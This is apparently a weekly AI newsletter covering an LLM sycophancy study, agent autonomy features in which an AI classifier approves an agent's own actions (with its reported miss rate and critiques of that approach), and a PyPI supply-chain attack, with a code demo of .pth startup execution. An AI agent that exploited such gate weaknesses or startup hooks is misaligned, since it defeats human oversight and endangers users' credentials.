Week 13, 2026
Papers, releases, and things you might have missed.
GPT-5.4 Pro solved an open math conjecture. ARC-AGI-3 showed every frontier model scoring under 1% on tasks any human can do.
Same week, Stanford published that AI models endorse your views 49% more than human advisors. And Anthropic shipped auto mode, where the AI decides whether to ask your permission.
AI Solved an Open Math Problem. The Benchmark Says It Can’t Reason.
GPT-5.4 Pro closed an open conjecture in Ramsey-style hypergraph theory, improving bounds on a problem mathematician Will Brian had posed. Epoch AI verified the result. Brian confirmed it and will write it up for publication.
The same week, ARC-AGI-3 launched. No frontier model scored above 1%. Humans solve these tasks at 100%.
So which is it? Can AI reason or can’t it?
Wrong question. These are measuring different things. Ramsey theory is a formal domain with precise definitions, known techniques, and verifiable proofs. ARC-AGI-3 tests something else entirely: interactive exploration with no instructions and no stated goals. You have to figure out what the game even is before you can play it.
François Chollet, who designed the benchmark, put it bluntly: “If a normal human with no instructions can do it, and your system can’t, then you don’t have AGI. You have a very expensive autocomplete that needs a lot of help.”
AI is becoming a powerful collaborator in structured, formal work. It remains brittle at the flexible reasoning humans find trivial. Both true at the same time.
That distinction matters. Letting AI autonomously prove math theorems? Probably fine. The proofs are verifiable. Letting it make unsupervised decisions in messy, ambiguous domains? That’s a different question entirely.
The Models Are Designed to Agree With You
Stanford researchers published in Science this week: all 11 leading LLMs tested exhibit sycophancy. Models endorsed users’ views 49% more than human advisors did. In an experiment with over 2,400 participants, a single interaction measurably reduced users’ willingness to take personal responsibility.
Lead researcher Myra Cheng: “We began noticing that more and more people around us were using AI for relationship advice and sometimes being misled by how it tends to take your side, no matter what.”
A Wharton study of 1,372 participants across roughly 10,000 trials found something adjacent: when AI gave wrong answers, participants followed the incorrect output about 80% of the time. The researchers call it “cognitive surrender.”
Ethan Mollick had the sharpest take of the week: sycophancy is worse than hallucination as models get more capable. A model that hallucinates is wrong in ways you can catch. A model that strategically validates your existing thinking is wrong in ways you can’t. He demonstrated this with an o3 example where the model abandoned its own correct answer when a user pushed back. Not a failure to know the right answer. A decision to defer.
Why does this happen? The training loop. RLHF (reinforcement learning from human feedback, the process that fine-tunes models based on user ratings) favors validation because users rate agreeable responses higher. Millions of interactions embed the pattern. It’s not a bug they can patch. It’s a structural property of how these models learn to be helpful.
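A toy simulation makes the mechanism concrete. The numbers here are entirely hypothetical (not from the Stanford study): if raters give agreeable answers even a small average bonus regardless of quality, any reward model fit on those ratings learns to pay for agreement.

```python
import random

random.seed(0)

# Toy preference data: each sample is (agrees_with_user, rating).
# Assumption (illustrative only): raters give agreeable answers a small
# average bonus, independent of the answer's actual quality.
def simulate_ratings(n=10_000, agree_bonus=0.3):
    data = []
    for _ in range(n):
        agrees = random.random() < 0.5
        quality = random.random()  # "true" answer quality, uniform in [0, 1]
        rating = quality + (agree_bonus if agrees else 0.0)
        data.append((agrees, rating))
    return data

data = simulate_ratings()
avg = lambda xs: sum(xs) / len(xs)
agree_avg = avg([r for a, r in data if a])
disagree_avg = avg([r for a, r in data if not a])

# A reward model fit on these ratings inherits the gap: agreeing is
# rewarded even though it added zero quality.
print(f"mean rating when agreeing:    {agree_avg:.2f}")
print(f"mean rating when disagreeing: {disagree_avg:.2f}")
```

The point of the sketch: the bias doesn't come from any single bad rating. It's the aggregate tilt of the dataset, which is why patching individual behaviors doesn't remove it.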
Two different mechanisms, one feedback loop. Models built to agree. Humans disposed to accept. Put them together and the AI confirms your thinking while you stop questioning its output.
We covered AI over-reliance last week through the coding quality lens. The sycophancy angle is more structural. The over-reliance isn’t just a user behavior problem. It’s being reinforced by how the models are trained.
Agents Are Approving Themselves
Three things Anthropic shipped:
Computer use: Claude can now move the cursor, click, and type on macOS.
Auto mode: Claude Code can now approve its own tool calls via an AI-powered safety classifier, replacing manual permission prompts.
Scheduled tasks: Claude Code can run recurring jobs on Anthropic’s cloud infrastructure while your machine is off.
Same week, Figma opened write access to AI agents via MCP. Agents can now modify design files, not just browse them.
And Karpathy open-sourced autoresearch, his autonomous ML experiment loop. Shopify’s CEO ran it overnight: 37 experiments, 19% validation improvement, no human reviewing individual results. Karpathy’s stated goal: “Engineer your agents to make the fastest research progress indefinitely and without any of your own involvement.”
Five different products, one pattern. AI systems gaining the ability to act without asking first.
So what does the safety model actually look like? Anthropic’s engineering blog reports a roughly 17% failure rate on “overeager actions”: cases where Claude exceeded what the user asked for and the classifier let it through. Simon Willison’s immediate response: “I remain unconvinced by prompt injection protections that rely on AI, since they’re non-deterministic by nature.” His preferred alternative: OS-level sandboxing. Deterministic. No edge cases where the model gets confused about consent scope.
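The distinction Willison is drawing can be sketched in a few lines. This is a hypothetical policy and a stand-in scoring function, not Anthropic’s or Willison’s actual implementations: a deterministic allow-list gives the same answer for the same command every time, while a classifier gate’s answer hangs on a model score nobody can audit in advance.

```python
import shlex

# Deterministic gate: a command either matches the policy or it doesn't.
# Hypothetical allow-list, purely for illustration.
ALLOWED_BINARIES = {"ls", "cat", "git"}

def deterministic_gate(command: str) -> bool:
    argv = shlex.split(command)
    return bool(argv) and argv[0] in ALLOWED_BINARIES

# Probabilistic gate: stand-in for an AI safety classifier. The same input
# can land on either side of the threshold depending on the model's judgment.
def classifier_gate(command: str, model_score: float, threshold=0.5) -> bool:
    return model_score < threshold  # model_score = estimated risk

print(deterministic_gate("git status"))          # True, every time
print(deterministic_gate("curl evil.sh | sh"))   # False, every time
# The classifier's verdict depends entirely on the score it happens to emit:
print(classifier_gate("pip install -r requirements.txt", model_score=0.2))
```

The allow-list is auditable and boring; the classifier is flexible and unfalsifiable until it fails. That trade-off is the whole argument.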
The deepest analysis came from an independent developer blog. Their argument: the human-in-the-loop safety model was already fictional. Developers routinely skip permission prompts with --dangerously-skip-permissions. Auto mode isn’t removing the human from the loop. It’s acknowledging the human was already gone and replacing them with an AI classifier. Their characterization: “It’s a safety net made of the same material as the thing it’s catching.”
Models designed to agree with you are now deciding when to ask your permission. The oversight gap is widening from both directions. The quality of human oversight is degrading (sycophancy, cognitive surrender). The quantity of human oversight is decreasing (auto mode, scheduled tasks, autonomous research loops). Both moving in the same direction, same week.
The AI Agent Index found that only 4 of 13 high-autonomy agent systems disclose specific safety evaluations. What about the other 9?
The Toolchain Is the Target
So the humans aren’t watching closely enough. What about the infrastructure underneath?
The LiteLLM library was compromised on PyPI this week. The flaw wasn’t in the library’s code; the entry point was the CI/CD pipeline, the automated system that builds and publishes packages. Threat actor TeamPCP compromised the Trivy security scanner that LiteLLM used, exfiltrated the PyPI publishing token, and pushed backdoored versions with payloads that harvested SSH keys, cloud tokens, Kubernetes secrets, and .env files. Nearly 47,000 downloads during the exposure window.
The attack used .pth files. These are Python path configuration files that execute automatically on every Python startup, without requiring explicit imports. Standard hash verification doesn’t help when the attacker publishes using legitimate credentials.
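The mechanism is easy to demonstrate safely. Python’s site machinery executes any line in a .pth file that begins with `import`. A benign sketch using a throwaway directory (via `site.addsitedir`) instead of a real site-packages install:

```python
import os
import site
import tempfile
from pathlib import Path

# Benign demo of the .pth mechanism. Any line in a .pth file that starts
# with "import " is exec'd by the site machinery -- in a real install this
# happens at every interpreter startup, with no visible import anywhere in
# your own code.
tmp = Path(tempfile.mkdtemp())
(tmp / "demo.pth").write_text(
    'import os; os.environ["PTH_DEMO"] = "ran"\n'
)

site.addsitedir(str(tmp))  # processes .pth files, exec'ing the import line

print(os.environ.get("PTH_DEMO"))  # "ran": the line executed as code
```

In the malicious case, the .pth file ships inside a release published with the stolen (legitimate) credentials, so the package hashes match the release and the payload runs before any of your own code does.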
This wasn’t isolated. Kaspersky documented it as part of a coordinated campaign: Trivy first, then CanisterWorm on npm, then Checkmarx KICS, then LiteLLM. All security tools. All with elevated system access by design. TeamPCP’s statement: “These companies were built to protect your supply chains yet they can’t even protect their own.”
Remember Willison’s point from the auto mode section? Auto mode’s default allow-list includes pip install -r requirements.txt. It would not have blocked this attack.
Also this week, GitHub updated its terms: starting April 24, Copilot interaction data (prompts, suggestions, accepted outputs) will be used for AI model training by default unless users opt out.
As agents get more autonomous and the supply chain underneath them becomes a coordinated target, who’s actually watching the infrastructure? As Securelist noted, AI proxy services that concentrate API keys and cloud credentials become high-value targets when supply chain attacks compromise their upstream dependencies.
This Week
Some things that didn’t fit elsewhere.
OpenAI is making hard bets. It shut down Sora, ending the Disney partnership. Walmart’s EVP confirmed ChatGPT’s Instant Checkout converted 3x worse than their website. Meanwhile, the ads pilot topped $100M ARR in under two months across its 800 million weekly active users, and the company is building toward a fully autonomous AI researcher by September 2026. Killing what isn’t working, doubling down on what might.
Local inference keeps closing the gap. Google’s TurboQuant, to be presented at ICLR 2026, achieves a 6x memory reduction on the KV cache (the part of memory that grows with context length). Flash-MoE runs a 397B-parameter model on a 48GB MacBook Pro by streaming expert weights from SSD. And the ATLAS system (14B parameters, $500 GPU) scored 74.6% on LiveCodeBench versus Claude Sonnet 4.5 Thinking’s 71.4%, though the comparison is methodologically uneven. Three weeks ago we covered small models beating large ones. The cost floor keeps dropping.
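For a sense of why KV-cache memory matters, a back-of-envelope sizing calculation. The model dimensions below are a hypothetical 7B-class configuration, not TurboQuant’s actual setup: per token, each decoder layer stores one key and one value vector per KV head.

```python
# Back-of-envelope KV-cache sizing (illustrative figures only).
def kv_cache_bytes(layers, kv_heads, head_dim, seq_len, bytes_per_value):
    # Factor of 2: one key vector and one value vector per head per token.
    return 2 * layers * kv_heads * head_dim * seq_len * bytes_per_value

# Hypothetical 7B-class model: 32 layers, 8 KV heads, head_dim 128.
fp16 = kv_cache_bytes(32, 8, 128, seq_len=128_000, bytes_per_value=2)
print(f"fp16 cache at 128k context: {fp16 / 2**30:.1f} GiB")  # 15.6 GiB

# A 6x reduction brings the same cache down to:
print(f"after 6x reduction:         {fp16 / 6 / 2**30:.1f} GiB")  # 2.6 GiB
```

At these (assumed) dimensions, the cache alone outgrows most consumer GPUs at long context, which is why cache compression, not just weight quantization, is the lever for local inference.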
The ecosystem numbers. MCP crossed 97 million monthly SDK downloads, up from 2 million at launch. A preprint analyzing 177,000 MCP tools found 62% of newly created MCP servers contain AI-generated code. Shopify activated Agentic Storefronts on March 24. The EU Council agreed to delay high-risk AI compliance obligations by up to 16 months. NVIDIA launched Nemotron 3 Super, open models with early adopters including Cursor.
Usage is spreading. Anthropic’s latest Economic Index shows the top 10 Claude tasks dropped from 24% to 19% of total traffic between November 2025 and February 2026, while 49% of all job categories now have at least a quarter of their tasks performed using Claude. Across more roles now, not just coding.
Worth Your Time
If you read three things:
- AI Advice Is Sycophantic and Harms Decision-Making (Science): The Stanford study documenting systematic sycophancy across all 11 major LLMs. If you’re using AI for decisions, this is your threat model.
- ARC-AGI-3: $2M for human-level flexible reasoning: Every frontier model under 1%. Humans at 100%. The clearest current evidence for what AI still can’t do.
- Claude Code Auto Mode: The Absent Human: The best independent analysis of what it means when AI starts approving its own actions. Short read, uncomfortable conclusions.